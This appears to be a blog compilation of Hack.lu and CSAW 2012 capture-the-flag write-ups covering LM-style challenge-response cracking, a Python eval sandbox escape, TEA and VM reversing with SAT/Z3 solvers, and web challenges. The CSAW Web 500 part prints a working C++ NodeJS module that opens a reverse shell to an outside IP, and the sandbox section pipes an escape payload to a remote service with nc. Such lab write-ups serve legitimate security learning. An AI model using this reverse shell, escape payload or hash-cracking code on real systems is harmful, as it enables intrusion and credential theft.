Our intel shows us that the Zombies use a MS-PPTP like protocol and luckily we could intercept a challenge-response transmission of one of the Zombie outposts. The important thing for Zombies in this war is mass! Not only brain mass but their mass. So they built their PPTP protocol compatible to all older Zombie soldiers. Luckily our science team could extract the algorithm of the challenge-response system out of a captured Zombie brain … I spare you the details, let's just say it was not a pretty sight. And here comes your part soldier: we need the password of this intercepted transmission. With this password we were finally able to turn this war to our favor. So move your ass soldier and good luck! https://ctf.fluxfingers.net/challenges/pptp.tar.gz credits: 450 +3 (1st), +2 (2nd), +1 (3rd)
The given tarball contains two important things: a Python script implementing two challenge/response algorithms for authentication, and a PCAP dump showing this TCP transmission between two hosts:
start_pptp 200 Ok dead234a1f13beef 200 41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6 incompatible 200 78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91
In the Python script, the two algorithms are named
response_newTechnologie
andresponse_lm
. From the network dump, we can assume that the first hash sent by the client is fromresponse_newTechnologie
: the server answered it wasincompatible
, so the client tried the older method and sent the second hash, generated withresponse_lm
. The older method is probably more buggy, so let’s work on it first. Here is the implementation:def lm_hash(self, input_password): # only use the first 14 bytes input_password = input_password[0:14] # convert all characters to uppercase chars input_password = input_password.upper() # split given password in two parts via 8 bytes password_part1 = input_password[0:8] # concat two 0 bytes to reach 8 bytes password_part2 = input_password[8:14] + "\0\0" # hash part 1 part1_des = des(password_part1) hash_part1 = part1_des.encrypt(self.constant) # hash part 2 part2_des = des(password_part2) hash_part2 = part2_des.encrypt(self.constant) # concat hash parts output_hash = hash_part1 + hash_part2 # return hash as hex value return binascii.hexlify(output_hash) def response_lm(self, challenge, password): # generate lm_hash for response password_hash = self.lm_hash(password) if len(challenge) != 16: raise ValueError("Challenge has to be 8 byte hex value.") # create three passwords for the response password_res1 = password_hash[0:16] password_res2 = password_hash[12:28] password_res3 = password_hash[28:32] + "000000000000" # response part 1 part1_des = des(binascii.unhexlify(password_res1)) res_part1 = part1_des.encrypt(binascii.unhexlify(challenge)) # response part 2 part2_des = des(binascii.unhexlify(password_res2)) res_part2 = part2_des.encrypt(binascii.unhexlify(challenge)) # response part 3 part3_des = des(binascii.unhexlify(password_res3)) res_part3 = part3_des.encrypt(binascii.unhexlify(challenge)) # create full response and return response = res_part1 + res_part2 + res_part3 return binascii.hexlify(response)
Having worked a lot with MSCHAPv2 in the past, I found this algorithm very similar to MSCHAPv2 but using 2 LM hashes instead of a NTLM hash. The first vulnerability, which is common to MSCHAPv2, is that the third part of the response only uses two variable bytes: the key of the DES algorithm for part 3 always ends with 6 NUL bytes. We can bruteforce these two bytes very easily (65536 DES computations are done in less than 0.1s on a modern computer) and get part of the LM hash of the password. Unfortunately, that is not very useful in this case: the password is too long to bruteforce the whole LM hash, so we can’t do anything with these two bytes.
The second vulnerability is that the key space for the first part of the LM hash is very reduced. First, the input password is converted to uppercase. If we assume that only alphabetical characters are present, that leaves us with only
26^8
(208 billions) possible keys. Still a lot, but manageable on a GPU in several hours. However, we’re in a contest, we can’t reimplement a GPU cracker and wait, we want the breakthrough bonus points!The third vulnerability is that DES takes an 8 character input as the key, but actually only uses 56 bits of that input, discarding the LSB of each character. This means that on the 26 possible alphabetical characters, only 13 need to be tested: the other 13 share the same high 7 bits. This reduces the key space to
13^8
(815 millions) possible keys, which can easily be tested with a simple C program on a CPU.The last thing we need is a way to check if the first 8 characters of the passwords match the ones used to generate the hash. If they match, the first part of the LM hash (first 64 bits) will be identical. This means the first part of the response will use an identical key, and because the challenge is constant that implies the first part of the response will be identical. Our bruteforce algorithm is the following:
For each 8 chars password using charset (EAOISCMWGYKQZ) if DES(challenge, DES("Trololol", password)) == 78165eccbf53cdb1 found
And here is a C implementation that finds the first 8 characters of the password, in uppercase, with an unknown LSB, in about 5 minutes on my laptop:
#define CONSTANT "Trololol" #define CHALLENGE "\xde\xad\x23\x4a\x1f\x13\xbe\xef" #define WANTED "x\x16^\xcc\xbfS\xcd\xb1" #define CHARSET "EAOISCMWGYKQZ" #define CHARSETSIZE ((unsigned long)(sizeof (CHARSET))) #define CHARSETSIZE2 ((CHARSETSIZE)*(CHARSETSIZE)) #define CHARSETSIZE4 ((CHARSETSIZE2)*(CHARSETSIZE2)) #define CHARSETSIZE8 ((CHARSETSIZE4)*(CHARSETSIZE4)) #define NSTEPS CHARSETSIZE8 static void build_key(int step, char* buffer) { int idx[8]; for (int i = 0; i < 8; ++i) { idx[i] = step % CHARSETSIZE; step /= CHARSETSIZE; } for (int i = 0; i < 8; ++i) for (int j = 0; j < 8; ++j) buffer[i*8 + j] = (CHARSET[idx[i]] >> (7 - j)) & 1; } int main(void) { char bf_key[64]; char res_key[64]; char final_res[64]; char constant_bits[64]; char challenge_bits[64]; char wanted_bits[64]; for (int i = 0; i < 8; ++i) for (int j = 7; j >= 0; --j) { constant_bits[i * 8 + (7 - j)] = (CONSTANT[i] >> j) & 1; challenge_bits[i * 8 + (7 - j)] = (CHALLENGE[i] >> j) & 1; wanted_bits[i * 8 + (7 - j)] = (WANTED[i] >> j) & 1; } for (int step = 0; step < NSTEPS; ++step) { memcpy(res_key, constant_bits, 64); memcpy(final_res, challenge_bits, 64); build_key(step, bf_key); setkey(bf_key); encrypt(res_key, 0); setkey(res_key); encrypt(final_res, 0); if (!memcmp(final_res, wanted_bits, 64)) { printf("Found: %d\n", step); return 0; } if ((step % 1000000) == 0) printf("Current step: %d\n", step); } return 0; }
According to this, the first 8 chars are (approximately):
"ZOMCIESA"
. Now we can use about the same code to bruteforce the last 6 chars. We just need to be careful to use the right part of the hash to generate the second part of the response. The C code is not very different, so I will just skip this and post the second part:"EOSEMS"
. We can easily check if our answer is valid:>>> PPTP().response_lm('dead234a1f13beef', 'ZOMCIESAEOSEMS') '78165eccbf53cdb11085e8e5e3626ba9bdefd5e9de62ce91'
The hash is exactly the same. Win! However, this is not the key yet: remember that we divided our key space by 4: we only considered uppercase characters (where we should have considered upper and lowercase), and only characters with the LSB equal to 1 (because DES ignored that bit anyway). To get the real password, we can just bruteforce the
4^14
(268 millions) different possibilities using the new technologie hash, which does not lose informations. Here is the script we used, with a small hack to hardcode that the key starts with “ZOMBIES” (this can be deduced easily by a human):import pptp for i in xrange(2**7 * 4**7): n1 = i / 128 n2 = i % 128 s1 = 'ZOMBIES' s2 = s1.lower() s = '' for j in xrange(7): if n2 & 1: s += s1[j] else: s += s2[j] n2 >>= 1 s1 = 'AEOSEMS' s2 = '@DNRDLR' s3 = s1.lower() s4 = s2.lower() for j in xrange(7): l = [s1, s2, s3, s4] s += l[n1 & 3][j] n1 >>= 2 x = pptp.PPTP() if x.response_newTechnologie('dead234a1f13beef', s) == '41787c9f6ffde56919ca3cd8d8944590a9fff68468e2bcb6': print s if (i % 100000) == 0: print i
After one or two minutes of computation (<3 PyPy), we get the real key that we can submit on the website:
ZomBIEsAdOReMS
.Hack.lu CTF 2012: The Sandboxed Terminal (400 points)
Since the zombie apocalypse started people did not stop to ask themselves how the whole thing began. An abandoned military base may lead to answers but after infiltrating the facility you find yourself in front of a solid steel door with a computer attached. Luckily this terminal seems to connect to a Python service on a remote server to reduce load on the small computer. While your team managed to steal the source, they need your Python expertise to hack this service and get the masterkey which should be stored in a file called key. https://ctf.fluxfingers.net:2076/c7238e81667a085963829e452223b47b/sandbox.py credits: 400 +3 (1st), +2 (2nd), +1 (3rd)
The sandbox source file contains the port number to connect to the terminal. A sessions prompts two numbers and an “operator”. These inputs are checked against regular expressions:
^[\d]{0,4}$
for the numbers and^[\W]+$
for the operator (and it must not exceed 1899 bytes). If each matches, then if the operator contains a single quote ('
) the operator is replaced byeval(operator)
. Then,eval(number1 + operator + number2)
is computer and printed.Before all of this, some code wraps builtins in order to prevent imports and uses of
open
andfile
.Our way to display the content of the
key
file was first to find a mean to evaluate alphanumerical code from theoperator
, and then to bypass the sandbox. The second part was the most easy:open.orig
gives access to the originalopen
builtin, thus executingopen.orig('key').read()
was enough to reach the key.Finding a way to craft alphanumerical caracters from the operator was far more difficult. The first thing to notice was that
()!=()
(which evaluates toFalse
) can be used as the number 0, and()==()
(which evaluates toTrue
) can be used as the number 1. From this, one can craft all possible numbers. Then, it is possible to take a minimal character set using Python’s backtick notation to get the string representation of an expression:`()==()`
yields'True'
. With non-printable ASCII chars, hexadecimal characters were available after oneeval
:>>> eval('`"\xfe"`[(()==())<<(()==())<<(()==())]') 'e'
When the global
eval
is used, the given expression is evaluated from code inside the sandbox method, in whichself
is the wapper ofeval
itself! Thus, evaluatingeval('self("0x41")')
will return the content of thea
variable.Using all these principles, it is possible to execute our code using 3 eval stages:
- first, the remote sandboxed terminal receives our bytes: numbers are empty,
and the
operator
contains our payload. The payload contains at least one single quote and theoperator
is evaluated once. With the previous tricks, one can craftself("...hexadecimally escaped bytes...")
- then, the second
eval
evaluatesself(...)
which is equivalent toeval("...escaped bytes..")
, and since we master completely the escaped bytes, and that these bytes can cover the full byte range, we can do everything!
Thus, we crafted the payload using the following script:
def get_num(n): '''Return a non-alphanum expression that evaluates to the given number.''' if n == 0: return '[]==()' elif n == 1: return '[]!=()' else: return '+'.join('([]!=())' for i in range(n)) # Craft "self("" result = ''.join(( '`{()==()}`[()==[]]+', # 's' '`"\xfe"`[%s]+' % get_num(4), # 'e' '`()==[]`[%s]+' % get_num(2), # 'l' '`"\xff"`[%s]+' % get_num(4), # 'f' '"(\\""+' # '("' )) # Turn the wanted expression into a string of hexadecimally escaped bytes. result += '`\'' for c in 'open.orig("key").read()': o = ord(c) hi = 0xf0 | (o >> 4) lo = 0xf0 | (o & 0x0f) result += '\x01.\x01' result += chr(hi) + '..' result += chr(lo) + '.....' result += '\'`[%s:-(%s):%s]+' % (get_num(1), get_num(1), get_num(6)) # Craft "\")" result += '"\\\")"' # Simulate the sandboxed environment. class Wrapper: pass self=eval open_orig = open open = Wrapper() open.orig = open_orig # Print results to stderr for debugging import sys print >> sys.stderr, '%s bytes: %s' % (len(result), repr(result)) print >> sys.stderr, '--> %s' % repr(eval(result)) print >> sys.stderr, '--> %s' % repr(eval(eval(result))) print '' print '' print result
Finally, we send the payload to the service:
python2 craft_payload.py | nc ctf.fluxfingers.net 2060
Key:
dafuq_how_did_you_solve_this_nonalpha_thingy
.- first, the remote sandboxed terminal receives our bytes: numbers are empty,
and the
Hack.lu CTF 2012: Mealtime (200 points)
Heading up the steeple gave you and your companion a nice view over the outbreak situation in your city. But it also attracted a lot of unwanted attention. Zombies are surrounding your spot and are looking for an entrance to the building. You obviously need some bait to lure them away so you can flee safely. Solve this challenge to find out which human bodypart zombies like the most. https://ctf.fluxfingers.net/challenges/mealtime.exe credits: 200 +3 (1st), +2 (2nd), +1 (3rd)
The challenge takes a 256 bits key as
argv[1]
, cuts it into 4 64 bits blocks, encrypts it using a modified TEA with a constant 32 bits key (different for each block), then compares the ciphered block to a 64 bits constant block. The goal was to find each 64 bits block independently then concatenate them to get the key. I’ll only detail what we did for one block, the other three blocks were the same with a different key/ciphered block.This Win32 executable used a simple
SeDebugPrivilege
trick to try to stop us from debugging. After patching this, we were able to run it inside a debugger to test if our implementation of the encryption algorithm we reversed was correct. After a lot of failed tries (being tired doesn’t help), we found that this code implemented the same algorithm:void tea(unsigned int* pdw1, unsigned int* pdw2) { unsigned int dw1 = *pdw1, dw2 = *pdw2; unsigned int cipher = 0; int i; for (i = 0; i < 64; ++i) { dw1 += (cipher + 0x78756c66) ^ (dw2 + ((dw2 << 4) ^ (dw2 >> 5))); cipher -= 0x61c88647; dw2 += (cipher + 0x78756c66) ^ (dw1 + ((dw1 << 4) ^ (dw1 >> 5))); } *pdw1 = dw1; *pdw2 = dw2; } int main(void) { unsigned int dw1 = 0x83ffeeea; // first part of input block unsigned int dw2 = 0xec0ac902; // second part of input block tea(&dw1, &dw2); printf("0x%08x 0x%08x\n", dw1, dw2); return 0; }
From there, we could either try to find a vulnerability in the algorithm and write a bruteforcer, or take the “lazy” route: provide a representation of the problem in a DIMACS file and run
cryptominisat
on it to solve the problem automagically. This Python script generated the DIMACS description of the problem (see my blog post about SAT and hash cracking for the CNFGenerator code and the severalcnf_*
functions):gen = CNFGenerator() dw2 = cnf_int(gen, 32) dw1 = cnf_int(gen, 32) cipher = cnf_const(gen, 0) addcst = cnf_const(gen, 0x63737265) subcst = cnf_const(gen, 0x61c88647) for i in xrange(32): cipher_plus = cnf_add(gen, cipher, addcst) sum1 = cnf_add(gen, dw2, cnf_xor(gen, cnf_sll(gen, dw2, 4), cnf_srl(gen, dw2, 5))) dw1 = cnf_add(gen, dw1, cnf_xor(gen, cipher_plus, sum1)) cipher = cnf_sub(gen, cipher, subcst) cipher_plus = cnf_add(gen, cipher, addcst) sum2 = cnf_add(gen, dw1, cnf_xor(gen, cnf_sll(gen, dw1, 4), cnf_srl(gen, dw1, 5))) dw2 = cnf_add(gen, dw2, cnf_xor(gen, cipher_plus, sum2)) cnf_equal(gen, dw1, 0x131af1be) cnf_equal(gen, dw2, 0x4bb34049) print gen.output()
This generates a DIMACS file with 23520 variables and 139232 clauses. CryptoMiniSAT can solve this in about 0.06s, generating correct values for the initial
dw1
anddw2
:615f7a6e 645f6572
.Repeating this technique on the three remaining 64 bits blocks gives us the following key:
--delicious_brainz_are_delicious
.Hack.lu CTF 2012: Donn Beach (500 points)
The famous zombie researcher “Donn Beach” almost created an immunization against the dipsomanie virus. This severe disease leads to the inability to defend against Zombies, later causes a complete loss of memory and finally turns you into one of them. Inexplicably Donn forgot where he put the license key for his centrifuge. Provide him a new one and humanity will owe you a debt of gratitude for fighting one of the most wicked illnesses today. https://ctf.fluxfingers.net/challenges/donn_beach.exe ctf.fluxfingers.net tcp/2055 credits: 500 +3 (1st), +2 (2nd), +1 (3rd)
This Win32 executable starts by asking a name, hashing it and comparing it to a constant, then asks a key, does several computations on it using a VM obfuscated with SSE3 instructions, and compares the result of these computations to four integer constants.
We can safely patch the name hashing and make sure that the name hash value is the constant we want - using hardware breakpoints, we can see that the name itself isn’t used later, but the name hash is. The key is composed of three 32 bits integers, read from stdin like this (in hex):
AAAAAAAA-BBBBBBBB-CCCCCCCC
.Before running code in the VM, the executable initializes the VM state with all the inputs to the algorithm:
- Name hash
- First part of the key (
key1
) - Second part of the key (
key2
) - Third part of the key (
key3
) - Pointer to the current instruction
- Pointer to a constant 256 bytes array
- Stack pointer (points to freshly allocated memory)
After running the VM code, it unpacks these values from the state and stores them back to stack variables. They are then compared to the constant values.
Looking inside the VM code a bit closer for 1 hour, and stepping into it with a debugger, we can notice several interesting things:
- The bytecode is interlaced with the VM code in the binary. The x86 code regularly contains long multi-byte NOPs, in which the VM code is placed. The VM simply ignores any instruction it does not know and skips to the next byte, so it will only execute the instructions from inside the NOPs.
- The VM state is contained in MMX registers
mm0
tomm3
, scrambled. Bytes of each of the VM 8 32 bits registers are shuffled to fill these 4 64 bits registers. - The instruction pointer always goes forward, and there does not seem to be anything that increments it with a non constant increment. This means the VM does not support jumps of any sort, so the logic inside of the VM is very reduced.
The 8 VM registers initially contain the following values:
- Reg 0: Constant 256 bytes array ptr
- Reg 1: Name hash
- Reg 2: key1
- Reg 3: key2
- Reg 4: key3
- Reg 5: 0
- Reg 6: Stack pointer
- Reg 7: EIP
Something also makes our life a lot easier: inside the instruction handlers, to read a register value, the code does not inline the SSE instructions to unshuffle and unpack the register. Instead, it gets a function pointer from a table which contains 8 register read functions (one for each register), and calls that function to get the register value in
mm4
. The same can be observed for register writes. This allows us to very easily notice the instructions reading and writing to registers.Using all of these infos, I started to statically reverse engineer all the instruction handlers present in the binary. After one additional hour of work and a lot of laughs after I was rickrolled by an instruction handler, a disassembler was ready:
code = map(ord, open('donn_beach.exe').read()[0x2400:]) OPCODES = { 0x11: ("ABORT", 1), 0x09: ("EXIT", 1), 0x3E: ("ADD", 2), 0x0D: ("PUSH", 2), 0x2A: ("PUSH8", 2), 0x26: ("MOV", 2), 0x4C: ("POP", 2), 0x17: ("XOR", 2), 0x54: ("MOV", 2), 0x7D: ("SLL", 2), 0x2C: ("LOAD8", 2), 0x3B: ("WRITE8", 2), 0x1B: ("SLL", 2), 0x5D: ("SRL", 2), 0x34: ("MOV", 2), 0x31: ("AND", 2), } i = 0 while i < len(code): op = code[i] if op in OPCODES: print OPCODES[code[i]][0], if OPCODES[code[i]][1] == 2: print "%02x" % code[i + 1] else: print i += OPCODES[code[i]][1] else: i += 1
Running it on the binary gives us the following output:
PUSH 00 PUSH 04 PUSH 03 PUSH 02 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 PUSH 05 PUSH 05 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 01 PUSH 03 PUSH 05 PUSH 04 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 02 POP 01 PUSH 05 PUSH 05 PUSH 03 PUSH 04 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 POP 02 POP 03 MOV 45 PUSH8 08 POP 00 MOV 52 SLL 50 SRL 20 SRL 20 SRL 20 XOR 25 MOV 54 SRL 50 SLL 40 SLL 40 SLL 40 XOR 45 PUSH8 10 POP 00 MOV 53 SRL 50 SLL 30 XOR 35 MOV 01 XOR 12 XOR 23 XOR 34 XOR 40 POP 00 POP 00 PUSH 04 PUSH 03 PUSH 02 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 PUSH 05 PUSH 05 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 01 PUSH 03 PUSH 05 PUSH 04 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 02 POP 01 PUSH 05 PUSH 05 PUSH 03 PUSH 04 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 POP 02 POP 03 MOV 45 PUSH8 08 POP 00 MOV 52 SLL 50 SRL 20 SRL 20 SRL 20 XOR 25 MOV 54 SRL 50 SLL 40 SLL 40 SLL 40 XOR 45 PUSH8 10 POP 00 MOV 53 SRL 50 SLL 30 XOR 35 MOV 01 XOR 12 XOR 23 XOR 34 XOR 40 EXIT
After a lot of boring reverse on this code, this gives us the following algorithm (the mapping table is the constant array mentioned earlier in the VM state):
static const unsigned char mapping[] = { 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x17, 0x44, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 }; static unsigned int transpose(unsigned int n) { unsigned int new_n = 0; new_n |= mapping[(n >> 0) & 0xFF] << 0; new_n |= mapping[(n >> 8) & 0xFF] << 8; new_n |= mapping[(n >> 16) & 0xFF] << 16; new_n |= mapping[(n >> 24) & 0xFF] << 24; return new_n; } static unsigned int rotl(unsigned int n, unsigned int sa) { return (n << sa) | (n >> (32 - sa)); } static void round(unsigned int* a, unsigned int* b, unsigned int* c, unsigned int* d) { unsigned int at; *a = transpose(*a); *b = transpose(*b); *c = transpose(*c); *d = transpose(*d); at = *a; *b = rotl(*b, 8); *c = rotl(*c, 16); *d = rotl(*d, 24); *a ^= *b; *b ^= *c; *c ^= *d; *d ^= at; } int main(void) { unsigned int nh = 0x4b17e245; // name hash, constant unsigned int k1, k2, k3; scanf("%x-%x-%x", &k1, &k2, &k3); round(&nh, &k1, &k2, &k3); round(&nh, &k1, &k2, &k3); if (nh != 0x01020304 || k1 != 0x05060708 || k2 != 0x09101112 || k3 != 0x0d14151e) puts("FAIL :("); else puts("SUCCESS :)"); return 0; }
Now that we have the algorithm, we still need to generate a key that will result in valid values in the end. As I was lazy and it was getting late in the evening, I implemented the algorithm with Z3Py and asked it to solve the problem for me. Unfortunately I failed several times to implement the algorithm, and the iteration time was quite long because Z3 needed 20-30 minutes to get me a key matching my description of the problem, so we only got the answer in the morning.
from z3 import * s = Solver() mapping = Array('mapping', BitVecSort(8), BitVecSort(8)) for l in open('mapping.txt'): l = l.strip() a, b = l.split() s.add(mapping[int(b, 16)] == int(a, 16)) nh = list(BitVecs('nh1 nh2 nh3 nh4', 8)) k1 = list(BitVecs('k11 k12 k13 k14', 8)) k2 = list(BitVecs('k21 k22 k23 k24', 8)) k3 = list(BitVecs('k31 k32 k33 k34', 8)) s.add(nh[0] == 0x4b, nh[1] == 0x17, nh[2] == 0xe2, nh[3] == 0x45) def transpose(n): return [mapping[n[0]], mapping[n[1]], mapping[n[2]], mapping[n[3]]] def rotl8(n): return [n[1], n[2], n[3], n[0]] def rotl16(n): return [n[2], n[3], n[0], n[1]] def rotl24(n): return [n[3], n[0], n[1], n[2]] def xor(a, b): return [a[0] ^ b[0], a[1] ^ b[1], a[2] ^ b[2], a[3] ^ b[3]] def hash(a, b, c, d, transp=True): if transp: at = transpose(a) bt = transpose(b) ct = transpose(c) dt = transpose(d) else: at, bt, ct, dt = a, b, c, d r1 = xor(at, rotl8(bt)) r2 = xor(rotl8(bt), rotl16(ct)) r3 = xor(rotl16(ct), rotl24(dt)) r4 = xor(rotl24(dt), at) return r1, r2, r3, r4 r1, r2, r3, r4 = hash(nh, k1, k2, k3) r1, r2, r3, r4 = hash(r1, r2, r3, r4) s.add(r1[0] == 0x01, r1[1] == 0x02, r1[2] == 0x03, r1[3] == 0x04) s.add(r2[0] == 0x05, r2[1] == 0x06, r2[2] == 0x07, r2[3] == 0x08) s.add(r3[0] == 0x09, r3[1] == 0x10, r3[2] == 0x11, r3[3] == 0x12) s.add(r4[0] == 0x0d, r4[1] == 0x14, r4[2] == 0x15, r4[3] == 0x1e) print s.check() print s.model()
After running for 20 minutes, this gave me the following valid key:
e5304760-47b7c45f-f59a8f29
.Later, a friend tried to find a better way to solve this problem, and noticed that it was reductible to a 32 bits bruteforce. Using this method, we found the previous key, but also a second valid key:
b6b09bf0-f23daa06-ac4ee747
.CSAW CTF 2012: Web 500 writeup
Web 500 was a webpage with a small UI sending AJAX commands to a backend. These commands were either some UNIX commands (
uname -a
,uptime
, …) or something that looked like a heartbeat check for an external service.Our first idea was obviously to inject UNIX commands but the backend seemed to have a very restrictive whitelist, allowing only the commands that were exposed by the UI and nothing else (not even adding options to the commands worked).
The heartbeat check sent a JSON command which looked like this:
{ "message": "extenderp", "extenderpurl": "http://127.0.0.1:8080/test/extenderptest.node" }
It turns out we can download this
extenderptest.node
file from the web server using the same URL. It was a simple NodeJS C++ module exporting a singletest
function which returned a string. This lead us to think theextenderp
message actually downloaded the NodeJS module from the URL and executed its test module. We checked if theextenderpurl
could point to the external world, and sure enough the web server tried to download a file from our server!The last step was then to write a NodeJS module which allowed us to get the key from the server. I choose to implement a fork/connect/dup2/execve exploit in the
test
function:#include <v8.h> #include <node.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> using namespace node; using namespace v8; extern "C" { static Handle<Value> test(const Arguments& args) { if (!fork()) { int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); struct sockaddr_in connaddr; memset(&connaddr, 0, sizeof (connaddr)); connaddr.sin_family = AF_INET; connaddr.sin_addr.s_addr = inet_addr("176.9.97.190"); connaddr.sin_port = htons(12345); connect(fd, (sockaddr*)&connaddr, sizeof (connaddr)); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); char* argv[] = { "/bin/sh", NULL }; execve("/bin/sh", argv, NULL); exit(0); } v8::HandleScope scope; return v8::String::New("Connectback should have happened"); } static void init(Handle<Object> target) { v8::Local<FunctionTemplate> local_function_template = v8::FunctionTemplate::New(test); target->Set(String::NewSymbol("test"), local_function_template->GetFunction()); } NODE_MODULE(expl, init); }
We uploaded that NodeJS module and used the
extenderp
command to get it to be run on the server, which worked very well! We were able to get shell access on the server and find the key for this challenge.CSAW CTF 2012: Web 400 writeup
Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.
Web 400 was an interesting challenge involving web exploits as well as crypto. We had access to a web application which allowed sending messages from a user to another. The twist is that all of these messages were encrypted using an unknown algorithm. When sending a message the user provides a key which is used to encrypt the message.
After analyzing the algorithm a bit (same key and message, trying different key sizes and block sizes, checking if every block is encrypted the same, etc.) we found out that it was some kind of ECB XOR using the key + a constant 64 bits value. This was only true for the first few blocks though: after that another key or another constant value was used. As we’ll soon see, this does not matter a lot.
We were able to confirm that this message system is vulnerable to XSS attacks by sending some strings that give HTML tags when encrypted. We just need to encode a cookie stealer and send it to the admin user to gain access to his account.
